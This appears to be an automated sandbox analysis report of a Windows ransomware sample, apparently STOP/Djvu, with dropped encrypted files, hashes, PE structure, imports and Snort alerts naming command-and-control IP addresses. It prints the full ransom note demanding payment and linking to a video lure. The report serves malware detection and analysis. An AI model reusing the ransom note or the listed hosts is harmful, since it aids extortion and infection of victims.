SHA-512:	7088DE92F34685C9E62FEC35CD448F52A944D82C3A9E548C01779F1B1823E063C761229A5858A755FDF45D11DBDEC2A5799ABFB75DB4D7FFC7F75461148656A2
Malicious:	false
Preview:	[{000..P....o?...[..@,X......q.W.tTR....{..qq...e...x5O..b....u.T....r...-+..Xv...kX.HC........K..T5D..-.t..dCi)..6.\.\I.........6.@ny..T.wv...W....3.gdj@.R;.K..u$y.)E.\|..%............\|c...7 .A...DD>3l..^.F..0y0iEd.Y.f.(r=...qe#...O...}&U.k...<..&.....R....o....Z..)...Y.. .0...l.I....W.H.K.h.....wE..6S<=.X...,.!....T.+..h.55.}!.-#=..)....[X.>M){.#..@M\w..\.c.`.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.334432622314308
Encrypted:	false
SSDEEP:	12:B77dr7UJeo2CFCbD9Orq/CYPMWBX1+cii9a:B7J0ZCbD9T/CYFBkbD
MD5:	66B6E53A21A0CEA1DA81C72D5ECFF779
SHA1:	8CA9418FCA83285F07E546550EB3DCD3C3CA32CA
SHA-256:	5B11EA3CD35E41510C3EDE95B63E53FEF048ECBC551A3B5A1B3FB760F17762DF
SHA-512:	7088DE92F34685C9E62FEC35CD448F52A944D82C3A9E548C01779F1B1823E063C761229A5858A755FDF45D11DBDEC2A5799ABFB75DB4D7FFC7F75461148656A2
Malicious:	false
Preview:	[{000..P....o?...[..@,X......q.W.tTR....{..qq...e...x5O..b....u.T....r...-+..Xv...kX.HC........K..T5D..-.t..dCi)..6.\.\I.........6.@ny..T.wv...W....3.gdj@.R;.K..u$y.)E.\|..%............\|c...7 .A...DD>3l..^.F..0y0iEd.Y.f.(r=...qe#...O...}&U.k...<..&.....R....o....Z..)...Y.. .0...l.I....W.H.K.h.....wE..6S<=.X...,.!....T.+..h.55.}!.-#=..)....[X.>M){.#..@M\w..\.c.`.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.459646650061745
Encrypted:	false
SSDEEP:	12:pgY2oAbH6Ddw7IC0Ihx9eDBIxQg7iMdrNMo1+cii9a:yroAba/ZIABaQKybD
MD5:	CFC0086E0A0942AF1496A973FEBA5F01
SHA1:	EF743FFAC304369CDF91FDAC32CA6FDED610C203
SHA-256:	A46978CD64F57E07ACDB6BE39E32DB4ED74808D2B64681B4951F05412ACEED01
SHA-512:	5BFA7F7191BBEC03E33D06CC7CEAF03C85787667C2D35E02EEDE156F5011F1CC7A6BC6DCCC9A11EFFC9FA37270C3D2D60152AC9C20410D54930482922F80F246
Malicious:	false
Preview:	[{000.]...s...t..s-R.4.6..W....A.aLBU..,M.K.;p.....#]......".>.....vG..4.....M..k...wo.U.`.0..&V...(.$pH*.ru`;...C...K.Xt......{.Z..w.....s. .Hr....x.MeGKh......./..e....3Dp&..\|.I.N.".,}.`...b.......`...y.%L...,..VXr........7.....4.Q....\|q4.+..xs......V.YOW..l...M..so........m.R._...H....U.27..~.u......Pt......:...`...:.....Q[-.B&N...hs.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.459646650061745
Encrypted:	false
SSDEEP:	12:pgY2oAbH6Ddw7IC0Ihx9eDBIxQg7iMdrNMo1+cii9a:yroAba/ZIABaQKybD
MD5:	CFC0086E0A0942AF1496A973FEBA5F01
SHA1:	EF743FFAC304369CDF91FDAC32CA6FDED610C203
SHA-256:	A46978CD64F57E07ACDB6BE39E32DB4ED74808D2B64681B4951F05412ACEED01
SHA-512:	5BFA7F7191BBEC03E33D06CC7CEAF03C85787667C2D35E02EEDE156F5011F1CC7A6BC6DCCC9A11EFFC9FA37270C3D2D60152AC9C20410D54930482922F80F246
Malicious:	false
Preview:	[{000.]...s...t..s-R.4.6..W....A.aLBU..,M.K.;p.....#]......".>.....vG..4.....M..k...wo.U.`.0..&V...(.$pH*.ru`;...C...K.Xt......{.Z..w.....s. .Hr....x.MeGKh......./..e....3Dp&..\|.I.N.".,}.`...b.......`...y.%L...,..VXr........7.....4.Q....\|q4.+..xs......V.YOW..l...M..so........m.R._...H....U.27..~.u......Pt......:...`...:.....Q[-.B&N...hs.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.807329751850404
Encrypted:	false
SSDEEP:	24:x3PUztTiPjPJZ3phazdlNigoR/MP10KcEXu5fIUlchlg2zq4ohHbD:xfotCphQdzbcfqG2zMh7D
MD5:	7E781B8852DC79816397844B5CAA8BB5
SHA1:	FE82F5FCBD3FABEA6D3BE8DB2C78413538A5AB2C
SHA-256:	ECC68838FC9D084DECCD23D4697573A38ACEC7EA1C0C743CC710554A76E247BE
SHA-512:	A2EE96CC0DF47D7FCC79181B5F04DE8AA6C10217BA85187925C9ECA2B0754D1C404EE474059371921C037CD6D49B64BA4902C818382CE2EA56B785BCAE5E442D
Malicious:	false
Preview:	<?xml..['..k.J.3...C.Y.x2....{..2..b(8.....b...w..l.vF...wt[.?.%E..8XB...E.&.../....~r......h..>.#.K.......T....-..A.....0..jN.....N..&....=...........6H..h...fp..A...;$b.Y..p.3.3.....C.......<....va..o...i........e.4.^...U..3i..Y.hl....^.[>G..O.....[..KJ.g......bl.D... ...9:.B.y....J.....Sn....J..%.&.....h..2.....4G....\..........l..9+..0}./...y......q=0..Lo...2:.^.yR}...Y....,..-..#)a`.2G.....\9...M..Q\|...F.....il..&.\|...G.O..V..9Zj.......P...P..hAL%g.}.f"....J........W\D..b.u._..RQ...6.H....Aa.RC..9..Y..3M.5......oA..W.<7..'......h.kYnt.....8f......<,...!....7....j.x..u.......{Z..3...Y...v..\|..../^......a....H>..3.x.N.......P..{H(.%^.z.q.L.......<.E..q...!.J.f.r...:u.u..z1....Ya...H......_.O..<.e.....]O...Y....wj...>.D..._...5.(.^.....kp....9...<.._......:..c....P.y..A..x..n......H@.........x.~.IO.P].D..n..g...Zww.b."...q2.....=...8.....M.P4.......t.&..Fa%.0\.?.O...q..Z.";E.g*8v....h..P\.e.......z.F4.....vJ!\.S.....d-#U..nk.

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.807329751850404
Encrypted:	false
SSDEEP:	24:x3PUztTiPjPJZ3phazdlNigoR/MP10KcEXu5fIUlchlg2zq4ohHbD:xfotCphQdzbcfqG2zMh7D
MD5:	7E781B8852DC79816397844B5CAA8BB5
SHA1:	FE82F5FCBD3FABEA6D3BE8DB2C78413538A5AB2C
SHA-256:	ECC68838FC9D084DECCD23D4697573A38ACEC7EA1C0C743CC710554A76E247BE
SHA-512:	A2EE96CC0DF47D7FCC79181B5F04DE8AA6C10217BA85187925C9ECA2B0754D1C404EE474059371921C037CD6D49B64BA4902C818382CE2EA56B785BCAE5E442D
Malicious:	false
Preview:	<?xml..['..k.J.3...C.Y.x2....{..2..b(8.....b...w..l.vF...wt[.?.%E..8XB...E.&.../....~r......h..>.#.K.......T....-..A.....0..jN.....N..&....=...........6H..h...fp..A...;$b.Y..p.3.3.....C.......<....va..o...i........e.4.^...U..3i..Y.hl....^.[>G..O.....[..KJ.g......bl.D... ...9:.B.y....J.....Sn....J..%.&.....h..2.....4G....\..........l..9+..0}./...y......q=0..Lo...2:.^.yR}...Y....,..-..#)a`.2G.....\9...M..Q\|...F.....il..&.\|...G.O..V..9Zj.......P...P..hAL%g.}.f"....J........W\D..b.u._..RQ...6.H....Aa.RC..9..Y..3M.5......oA..W.<7..'......h.kYnt.....8f......<,...!....7....j.x..u.......{Z..3...Y...v..\|..../^......a....H>..3.x.N.......P..{H(.%^.z.q.L.......<.E..q...!.J.f.r...:u.u..z1....Ya...H......_.O..<.e.....]O...Y....wj...>.D..._...5.(.^.....kp....9...<.._......:..c....P.y..A..x..n......H@.........x.~.IO.P].D..n..g...Zww.b."...q2.....=...8.....M.P4.......t.&..Fa%.0\.?.O...q..Z.";E.g*8v....h..P\.e.......z.F4.....vJ!\.S.....d-#U..nk.

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.893644520875933
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
MD5:	B65D7C11FCF0D75B3E599B80543A852D
SHA1:	D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
SHA-256:	D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
SHA-512:	EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.893644520875933
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
MD5:	B65D7C11FCF0D75B3E599B80543A852D
SHA1:	D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
SHA-256:	D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
SHA-512:	EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.761135023384828
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	240'128 bytes
MD5:	a25ac46e5bea920465d1838177782e5b
SHA1:	7abf711cac6ff5f35fc0b3f435d6ec5d9b0a0298
SHA256:	4f367a58544f96f8d0dd19d323acf0db1437d2cd8ef96324a37ea7be20cabf36
SHA512:	a469acbfc356df68532eaf869ee0e56c7ad8323faf4a5c63d01bacb6514232eb0f4defb389cc893e8fe4b31fe1b672d7e5c026711b7590030ae87b433e6f93a4
SSDEEP:	3072:IMyOsyYDXRL9QTYtSH+E5l675WmXVxS0VRqmVq+h56cphuoqL54ee6UWGG80yWJx:KpLRLa0t0q60Nqmhuoq2eehRGZpJT
TLSH:	DC34CF5173D1D4B5F56342315830DAE41A3EFCBA8EA48A57F3583B1F2C71281AB62B72
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5....Ko......Ko.5....Ko.Rich.Ko.........................PE..L......d...

File Icon


Icon Hash:	7149494555444043

Static PE Info

General

Entrypoint:	0x4043c7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x640085BC [Thu Mar 2 11:17:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8744ff8cb8213e20c3a4b3f29831f2ef

Entrypoint Preview

Instruction
call 00007F3D1C8320A7h
jmp 00007F3D1C82D4A4h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [esi], 00411270h
mov byte ptr [esi+08h], 00000000h
push dword ptr [eax]
call 00007F3D1C82D6CDh
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [ecx], 00411270h
mov eax, dword ptr [eax]
mov dword ptr [ecx+04h], eax
mov eax, ecx
mov byte ptr [ecx+08h], 00000000h
pop ebp
retn 0008h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [esi], 00411270h
mov byte ptr [esi+08h], 00000000h
call 00007F3D1C82D637h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00411270h
jmp 00007F3D1C82D6BBh
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov esi, ecx
cmp esi, edi
je 00007F3D1C82D63Fh
call 00007F3D1C82D6A8h
cmp byte ptr [edi+08h], 00000000h
je 00007F3D1C82D62Eh
push dword ptr [edi+04h]
mov ecx, esi
call 00007F3D1C82D65Ah
jmp 00007F3D1C82D628h
mov eax, dword ptr [edi+04h]
mov dword ptr [esi+04h], eax
pop edi
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00411270h
call 00007F3D1C82D677h
test byte ptr [ebp+08h], 00000001h
je 00007F3D1C82D629h
push esi
call 00007F3D1C82B8CDh

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16a04	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x288c000	0xd268	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16a54	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x15f60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10000	0x16c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe314	0xe400	eaede8625fd2cd7a288d3a167584f805	False	0.6020250822368421	data	6.733553791725584	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x10000	0x7248	0x7400	8b25a86a077bad30a64de8a0e406b8ec	False	0.38190328663793105	data	4.838446131421907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x2873380	0x17a00	f28c6f93d652eb00569398f38cc8cf5c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x288c000	0xd268	0xd400	0c9e0cd40e057aa429c7fb34de41ecdc	False	0.3447449882075472	data	4.55857381397413	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x28925a0	0x2	data			5.0
RT_CURSOR	0x28925a8	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x28928d8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x2892a30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x28938d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x2894180	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0x2894718	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x2894848	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x2894920	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x28957c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x2896070	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x2896608	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x28974b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x2897d58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x288c700	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Japanese	Japan	0.4349680170575693
RT_ICON	0x288d5a8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Japanese	Japan	0.5555054151624549
RT_ICON	0x288de50	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Japanese	Japan	0.5846774193548387
RT_ICON	0x288e518	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Japanese	Japan	0.6076589595375722
RT_ICON	0x288ea80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Japanese	Japan	0.4437759336099585
RT_ICON	0x2891028	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Japanese	Japan	0.49366791744840527
RT_ICON	0x28920d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Japanese	Japan	0.526595744680851
RT_DIALOG	0x2898588	0x5a	data			0.8666666666666667
RT_STRING	0x28985e8	0x36e	data	Japanese	Japan	0.48177676537585423
RT_STRING	0x2898958	0x68e	data	Japanese	Japan	0.4296781883194279
RT_STRING	0x2898fe8	0x27a	data	Japanese	Japan	0.5
RT_GROUP_CURSOR	0x2892a08	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x28946e8	0x30	data			0.9375
RT_GROUP_CURSOR	0x28948f8	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x28965d8	0x30	data			0.9375
RT_GROUP_CURSOR	0x28982c0	0x30	data			0.9375
RT_GROUP_ICON	0x2892538	0x68	data	Japanese	Japan	0.6826923076923077
RT_VERSION	0x28982f0	0x298	OpenPGP Public Key			0.5090361445783133

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, GlobalAlloc, GetLastError, SetLastError, GetThreadContext, GetTickCount, CreateEventA, LoadLibraryA, LoadLibraryW, LoadLibraryExW, GetModuleFileNameW, GetSystemDirectoryA, GetTempPathA, CreateDirectoryW, SetFileAttributesW, GetVolumeInformationA, BuildCommDCBW, SetComputerNameExA, VerifyVersionInfoW, IsProcessInJob, SetVolumeMountPointW, GetLocaleInfoW, SetCalendarInfoW, GetNumberFormatW, GetStringTypeW, SetConsoleCursorInfo, AllocConsole, WriteConsoleW, AddConsoleAliasA, OutputDebugStringW, GetConsoleCP, FlushFileBuffers, IsBadStringPtrA, InterlockedExchange, EncodePointer, DecodePointer, ReadFile, RaiseException, RtlUnwind, GetCommandLineW, IsProcessorFeaturePresent, HeapAlloc, HeapFree, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, SetFilePointerEx, GetConsoleMode, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetCurrentThreadId, GetProcessHeap, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LCMapStringW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, SetStdHandle, CreateFileW
USER32.dll	GetSysColorBrush, DdeFreeStringHandle
GDI32.dll	GetCharWidthW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Japanese	Japan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/25/24-21:29:44.396945	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49757	213.172.74.157	192.168.2.4
05/25/24-21:29:44.401863	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49758	213.172.74.157	192.168.2.4
05/25/24-21:30:00.599943	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49784	80	192.168.2.4	158.160.165.129
05/25/24-21:30:01.497363	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49787	80	192.168.2.4	158.160.165.129
05/25/24-21:29:57.239689	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49778	80	192.168.2.4	158.160.165.129
05/25/24-21:29:40.316894	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49752	80	192.168.2.4	158.160.165.129
05/25/24-21:29:45.087893	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49761	80	192.168.2.4	158.160.165.129
05/25/24-21:29:44.285365	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49760	80	192.168.2.4	213.172.74.157
05/25/24-21:29:38.780399	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49749	80	192.168.2.4	158.160.165.129
05/25/24-21:29:44.285365	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49760	80	192.168.2.4	213.172.74.157
05/25/24-21:29:46.731629	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49764	80	192.168.2.4	158.160.165.129
05/25/24-21:29:51.704930	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49770	80	192.168.2.4	158.160.165.129
05/25/24-21:29:45.888233	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49763	80	192.168.2.4	158.160.165.129
05/25/24-21:29:50.854256	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49769	80	192.168.2.4	158.160.165.129
05/25/24-21:29:23.967892	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49737	80	192.168.2.4	158.160.165.129
05/25/24-21:29:37.997029	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49748	80	192.168.2.4	158.160.165.129
05/25/24-21:29:26.439461	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49740	80	192.168.2.4	158.160.165.129
05/25/24-21:29:28.810994	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49743	80	192.168.2.4	158.160.165.129
05/25/24-21:29:47.693105	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49766	80	192.168.2.4	158.160.165.129
05/25/24-21:29:55.404520	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49775	80	192.168.2.4	158.160.165.129
05/25/24-21:29:25.627974	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49739	80	192.168.2.4	158.160.165.129
05/25/24-21:30:14.919115	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49797	80	192.168.2.4	158.160.165.129
05/25/24-21:30:22.918329	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49802	80	192.168.2.4	158.160.165.129
05/25/24-21:29:54.574933	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49774	80	192.168.2.4	158.160.165.129
05/25/24-21:30:25.031123	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49805	80	192.168.2.4	158.160.165.129
05/25/24-21:29:41.205625	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49754	80	192.168.2.4	189.163.126.89
05/25/24-21:29:41.205625	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49754	80	192.168.2.4	189.163.126.89
05/25/24-21:29:59.082949	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49782	80	192.168.2.4	158.160.165.129
05/25/24-21:29:36.317305	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49745	80	192.168.2.4	158.160.165.129
05/25/24-21:29:28.037194	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49742	80	192.168.2.4	158.160.165.129
05/25/24-21:29:44.284933	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49759	80	192.168.2.4	158.160.165.129
05/25/24-21:29:43.458282	TCP	2833438	ETPRO TROJAN STOP Ransomware CnC Activity	49757	80	192.168.2.4	213.172.74.157
05/25/24-21:29:56.417456	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49777	80	192.168.2.4	158.160.165.129
05/25/24-21:29:23.042406	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49736	80	192.168.2.4	158.160.165.129
05/25/24-21:29:27.244515	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49741	80	192.168.2.4	158.160.165.129
05/25/24-21:29:37.086113	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49747	80	192.168.2.4	158.160.165.129
05/25/24-21:29:58.049560	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49780	80	192.168.2.4	158.160.165.129
05/25/24-21:29:49.866228	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49767	80	192.168.2.4	158.160.165.129
05/25/24-21:30:03.404543	TCP	2019714	ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile	49789	80	192.168.2.4	91.92.253.69
05/25/24-21:29:39.561780	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49750	80	192.168.2.4	158.160.165.129
05/25/24-21:30:02.640033	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49788	80	192.168.2.4	158.160.165.129
05/25/24-21:29:41.129515	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49753	80	192.168.2.4	158.160.165.129
05/25/24-21:30:30.914264	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49810	80	192.168.2.4	158.160.165.129
05/25/24-21:29:24.807766	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49738	80	192.168.2.4	158.160.165.129

Network Port Distribution

TCP Packets

